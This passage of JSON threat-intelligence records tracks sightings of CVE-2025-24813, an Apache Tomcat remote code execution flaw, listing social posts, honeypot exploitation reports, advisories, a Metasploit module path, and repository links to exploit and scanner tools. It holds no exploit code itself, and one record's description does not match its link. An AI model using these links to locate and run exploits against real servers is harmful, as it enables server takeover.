"https://bsky.app/profile/pmloik.bsky.social/post/3llwphvkqtn2r", "content": "", "creation_timestamp": "2025-04-03T20:10:17.276291Z"}, {"uuid": "ff6feaa1-ff19-4448-9f8f-083902c221d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lm2frumdbs2g", "content": "", "creation_timestamp": "2025-04-05T07:27:35.524545Z"}, {"uuid": "874706f8-234e-45e2-a076-8d643d00b4ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3llwsemlwyu25", "content": "", "creation_timestamp": "2025-04-03T21:02:13.678774Z"}, {"uuid": "46f3d205-2307-461a-96d9-532c32f12570", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/cybersecurity.page/post/3lmdxpuhneg2h", "content": "", "creation_timestamp": "2025-04-09T02:42:30.929821Z"}, {"uuid": "dc757f6d-aaf6-4fed-a871-3a84bc466964", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/royans.bsky.social/post/3lm3slhxup62a", "content": "", "creation_timestamp": "2025-04-05T20:49:17.535870Z"}, {"uuid": "f69f0df3-c483-403c-bc2d-19420e3440b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lm3z6y7p222k", "content": "", "creation_timestamp": "2025-04-05T22:47:35.926696Z"}, {"uuid": "7dc07c54-4bdd-4e2d-85b9-8f082c684d3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3ltfep2o2py2b", "content": "", "creation_timestamp": "2025-07-07T18:03:43.863291Z"}, {"uuid": "66687bb0-8a94-4839-af17-540b4d3c684c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lnaq4tzxg32x", "content": "", "creation_timestamp": "2025-04-20T13:13:53.173786Z"}, {"uuid": "9b878c03-cd78-4a75-a9e3-e7dd59c64673", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lmdep7kmom2t", "content": "", "creation_timestamp": "2025-04-08T21:02:10.789639Z"}, {"uuid": "331834dd-921e-4cf3-a141-884c2a7d9bb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-09)", "content": "", "creation_timestamp": "2025-04-09T00:00:00.000000Z"}, {"uuid": "84d39c05-a32c-4884-9cda-8c441b3733a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-12)", "content": "", "creation_timestamp": "2025-04-12T00:00:00.000000Z"}, {"uuid": "60b65ce9-32ee-4663-9398-0bec6d02064d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114705217531044379", "content": "", "creation_timestamp": "2025-06-18T16:05:19.814880Z"}, {"uuid": "d097d0eb-0a31-48bb-9fd9-acb972a6912b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://gist.github.com/meysam81/19c3a6625443716b623ff8ea018112d3", "content": "", "creation_timestamp": "2025-04-22T04:54:19.000000Z"}, {"uuid": "e5454dd1-cb0d-4a34-bfd2-46bc603eec7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "MISP/85904d3b-1b16-528f-8394-ddfd11e0289e", "content": "", "creation_timestamp": "2025-07-03T13:25:46.000000Z"}, {"uuid": "41fbc0b0-8bea-4471-a88b-e0b2613677d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/securitycipher.bsky.social/post/3lnsjyt665u2j", "content": "", "creation_timestamp": "2025-04-27T15:12:07.085180Z"}, {"uuid": "a79c2fc4-b71e-4dd8-a749-29c63d9de54b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:04.000000Z"}, {"uuid": "a223985a-6865-41d1-9269-f8262d36c840", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-571c4095-786a21dfffbe298b", "content": "", "creation_timestamp": "2025-07-04T11:33:48.751516Z"}, {"uuid": "d6375e95-a808-4645-a0b1-c52f2574ae59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3lt2qfcrqp22u", "content": "", "creation_timestamp": "2025-07-03T12:33:44.737073Z"}, {"uuid": "dcbd0d56-34a5-4d69-94f4-f0d060113c66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114789378245748413", "content": "", "creation_timestamp": "2025-07-03T12:48:30.075235Z"}, {"uuid": "675cb31c-6baa-4419-b9e2-8536dead6920", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3ltet25lgj22o", "content": "", "creation_timestamp": "2025-07-07T12:47:51.498315Z"}, {"uuid": "80007f80-e189-4cce-a3a9-39582855511a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://unit42.paloaltonetworks.com/apache-cve-2025-24813-cve-2025-27636-cve-2025-29891/", "content": "", "creation_timestamp": "2025-07-03T08:00:03.000000Z"}, {"uuid": "71e3ff57-8f67-45eb-bfab-1dfe53533d18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/bolhasec.com/post/3lp5myjowbm2u", "content": "", "creation_timestamp": "2025-05-14T18:30:08.813909Z"}, {"uuid": "855f4086-4d82-4249-aa41-0adf02e0cdc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/cti-news.bsky.social/post/3lt2if2lwxt2r", "content": "", "creation_timestamp": "2025-07-03T10:10:26.270242Z"}, {"uuid": "3d1e0882-7be0-43cc-a9cb-ef4c366c1dca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-09-29T03:12:16.000000Z"}, {"uuid": "24ba1469-debc-4006-a645-96216cc9332d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-17)", "content": "", "creation_timestamp": "2025-11-17T00:00:00.000000Z"}, {"uuid": "66e424b5-c8cd-4e20-8610-2a9ab7981319", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-09-28T08:23:31.000000Z"}, {"uuid": "918eb1f5-c8ec-47ff-9ce3-31f1ce9f1435", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-20)", "content": "", "creation_timestamp": "2025-11-20T00:00:00.000000Z"}, {"uuid": "9f39a69c-6e9f-4292-9ab6-57bfd3a00892", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-25)", "content": "", "creation_timestamp": "2025-11-25T00:00:00.000000Z"}, {"uuid": "0b603489-9d0f-4af7-9612-3a54fc71f1f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-22)", "content": "", "creation_timestamp": "2025-11-22T00:00:00.000000Z"}, {"uuid": "abb14e60-47d8-4372-9070-496774aa18f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-18)", "content": "", "creation_timestamp": "2025-12-18T00:00:00.000000Z"}, {"uuid": "2d5ed2be-3cc4-41f3-af8a-d484a40b09ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-24)", "content": "", "creation_timestamp": "2025-11-24T00:00:00.000000Z"}, {"uuid": "e59295a9-27b5-4206-8dbb-b0b82d56da84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/tomcat_partial_put_deserialization.rb", "content": "", "creation_timestamp": "2025-04-02T21:27:31.000000Z"}, {"uuid": "1628fab5-3cf1-4750-b745-afad9f040c8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-23)", "content": "", "creation_timestamp": "2025-11-23T00:00:00.000000Z"}, {"uuid": "0be7e3eb-f672-4a6f-9fcf-9ce5ac138aef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3mdy4an67zc2q", "content": "", "creation_timestamp": "2026-02-03T19:36:11.423367Z"}, {"uuid": "8b001bc7-7a22-4f42-9185-a3ee2225dcb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-24)", "content": "", "creation_timestamp": "2025-11-24T00:00:00.000000Z"}, {"uuid": "76303d88-5dbc-4748-82dd-ed8a62e69138", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/hackernoon.com/post/3mdvqlpigym2i", "content": "", "creation_timestamp": "2026-02-02T21:02:18.768360Z"}, {"uuid": "3e714172-148f-4d9c-b3f9-405f502e36d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/L38WC5Z6StDAbVGWur3J1et47qVqp8n45yINKLUpuArTxNY", "content": "", "creation_timestamp": "2025-12-23T15:00:07.000000Z"}, {"uuid": "8eb26ba1-aa20-4ee1-b691-8acd735047ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/8b291831-2785-48c5-bce6-8e1ad5925260", "content": "", "creation_timestamp": "2026-03-19T14:30:50.500201Z"}, {"uuid": "d9ec38b7-ba85-4f4d-8dd7-362ba60414af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1497", "content": "", "creation_timestamp": "2025-03-11T04:00:00.000000Z"}, {"uuid": "4b34ec25-f48e-4483-ac1f-09dcd954f13e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/fe473d70-7fe2-43e9-bd35-c8b91546205c", "content": "", "creation_timestamp": "2026-02-02T12:26:04.406426Z"}, {"uuid": "dea96d95-428d-4c44-b220-5a2421dc6a68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/2uioG1MInf7UvL10ReoF_aKQ3FrQ1V6xyfJ0eyTqrtyfxcM", "content": "", "creation_timestamp": "2025-12-27T03:21:05.000000Z"}, {"uuid": "c8d69c3b-7156-4141-8a82-06a6f83a24c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/7omxUZ2uMXoER28uRMclbQ_dLv3_MyobI63W53jiSYQupcI", "content": "", "creation_timestamp": "2025-09-15T03:00:05.000000Z"}, {"uuid": "8ca170a7-adf5-4dbc-acc4-823575627827", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/vGftsyUiEMeyjPcl2UtvJfMNUjwCrmwOhiCYLQD2SH3tqAc", "content": "", "creation_timestamp": "2025-12-10T15:00:07.000000Z"}, {"uuid": "5b2ffd54-bd24-40e2-af63-e7ddf5999d39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/46756", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aAutomated scanner + exploit for CVE-2025-24813\nURL\uff1ahttps://github.com/salo-404/firewall\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-08-06T07:58:07.000000Z"}, {"uuid": "6a5d0fa0-9e82-4fcd-b55c-fc15df70f4fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0395/", "content": "", "creation_timestamp": "2026-04-02T17:00:00.000000Z"}, {"uuid": "3226edbd-151b-4acd-8752-c07f5d42c917", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/36280", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aRemote Code Execution (RCE) vulnerability in Apache Tomcat.\nURL\uff1ahttps://github.com/Eduardo-hardvester/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-05-10T16:01:14.000000Z"}, {"uuid": "b3250d5d-3cad-4544-bb60-c70d421d8fbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/wPxuKkvaeObl7wP7fVpj1j1W_8mLNT5U7Q8iJzLFoolh0zg", "content": "", "creation_timestamp": "2025-06-21T21:00:05.000000Z"}, {"uuid": "a693ab1d-a5e5-49d8-b91e-dee83f67fe68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://gist.github.com/fernandinand/80cb943bc13477d76a3adff5cb86715c", "content": "", "creation_timestamp": "2026-04-22T13:26:30.000000Z"}, {"uuid": "4dcb11ba-24eb-4357-a3e1-78d002ae68a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/41333", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1atomcat CVE-2025-24813 \u53cd\u5e8f\u5217\u5316RCE\u73af\u5883\nURL\uff1ahttps://github.com/x1ongsec/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-06-21T14:26:10.000000Z"}, {"uuid": "9935d51b-f6b9-4bed-b743-89de2483f540", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "cd6eba8f-a631-4b9d-a629-0d839048fa94", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://github.com/range42/range42-catalog/tree/main/03_container_layer/docker/_ctf/cve/web/tomcat/CVE-2025-24813", "content": "", "creation_timestamp": "2026-04-15T14:28:37.196196Z"}, {"uuid": "9d4055b4-5c68-46bb-b1d4-00098c6d906c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/cvedetector/19979", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24813 - Apache Tomcat Default Servlet Path Equivalence Remote Code Execution and Information Disclosure\", \n  \"Content\": \"CVE ID : CVE-2025-24813 \nPublished : March 10, 2025, 5:15 p.m. | 2\u00a0hours, 7\u00a0minutes ago \nDescription : Path Equivalence: 'file.Name' (Internal Dot) leading to\u00a0Remote Code Execution and/or Information disclosure\u00a0and/or malicious content added to uploaded files via write enabled\u00a0Default Servlet\u00a0in Apache Tomcat.  \n  \nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98.  \n  \nIf all of the following were true, a malicious user was able to view       security sensitive files and/or inject content into those files:  \n-\u00a0writes enabled for the default servlet (disabled by default)  \n- support for partial PUT (enabled by default)  \n- a target URL for security sensitive uploads that was a sub-directory of\u00a0a target URL for public uploads  \n-\u00a0attacker knowledge of the names of security sensitive files being\u00a0uploaded  \n-\u00a0the security sensitive files also being uploaded via partial PUT  \n  \nIf all of the following were true, a malicious user was able to       perform remote code execution:  \n- writes enabled for the default servlet (disabled by default)  \n-\u00a0support for partial PUT (enabled by default)  \n-\u00a0application was using Tomcat's file based session persistence with the\u00a0default storage location  \n-\u00a0application included a library that may be leveraged in a\u00a0deserialization attack  \n  \nUsers are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.98, which fixes the issue. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"10 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-10T20:43:09.000000Z"}, {"uuid": "1b21eff6-b548-418e-9e1c-c9a986ae18d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/BleepingComputer/21727", "content": "\u200aCritical RCE flaw in Apache Tomcat actively exploited in attacks\n\nA critical remote code execution (RCE) vulnerability in Apache Tomcat tracked as CVE-2025-24813 is actively exploited in the wild, enabling attackers to take over servers with a simple PUT request. [...]\n\nhttps://www.bleepingcomputer.com/news/security/critical-rce-flaw-in-apache-tomcat-actively-exploited-in-attacks/", "creation_timestamp": "2025-03-17T13:55:20.000000Z"}, {"uuid": "88827118-2a5b-49f2-80ef-8aa5924c7567", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/ktfF1YjAfTgGnV4T6AQBqxJFytPD6zIUM1POBEH3rhcPUWE", "content": "", "creation_timestamp": "2025-09-03T15:00:07.000000Z"}, {"uuid": "e86fd79b-25fa-4b0b-ac55-777ac73588a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/54272", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aApache (CVE-2025-24813) GOExploiter Checker &amp; Exploiter very Fast \nURL\uff1ahttps://github.com/drcrypterdotru/Apache-GOExploiter\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-10-05T12:27:43.000000Z"}, {"uuid": "774f19fc-cd60-4f9f-8791-e2a2f695877a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/46758", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aAutomated scanner + exploit for CVE-2025-24813\nURL\uff1ahttps://github.com/salo-404/firewall.\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-08-06T08:06:37.000000Z"}, {"uuid": "a6abe17a-f758-4e98-9923-9c5c3a24b98f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/50108", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aThis is a PoC for the CVE-2025-24813 and tested in different environments.\nURL\uff1ahttps://github.com/CEAlbez/CVE-2025-24813-PoC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-03T11:39:28.000000Z"}, {"uuid": "11be6eb4-3ff5-4122-800b-093884721808", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/50761", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1a\ud83d\udd13 Decrypt FairPlay-protected iOS apps on macOS (SIP-enabled) using CVE-2025-24204. Supports macOS 15.0-15.2.\nURL\uff1ahttps://github.com/Makavellik/POC-CVE-2025-24813-Apache-Tomcat-Remote-Code-Execution\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-08T18:06:19.000000Z"}, {"uuid": "a1acb095-f6a1-47b7-b123-9eeccd6ac4e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/50103", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1a\ud83d\udee0 Exploit vulnerable Apache Tomcat servers by scanning for CVE-2025-24813 and uploading files with this Go-based toolkit.\nURL\uff1ahttps://github.com/Olabanji10/Apache-GOExploiter\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-03T10:35:25.000000Z"}, {"uuid": "4c159bf9-e061-4f51-bd1c-520fa6877448", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/0jvjkPEZnoW_0g8cjJAx2BIIU7bcv6ZLASQZj1TPT87LGFs", "content": "", "creation_timestamp": "2025-07-19T21:00:04.000000Z"}, {"uuid": "37394718-56d8-4cc6-bcde-537f1cd2bd0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/34430", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aProof of Concept (PoC) script for CVE-2025-24813, vulnerability in Apache Tomcat.\nURL\uff1ahttps://github.com/hakankarabacak/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-27T13:53:10.000000Z"}, {"uuid": "8d705693-86ae-4405-84d1-cbdd294aa45f", "vulnerability_lookup_origin": 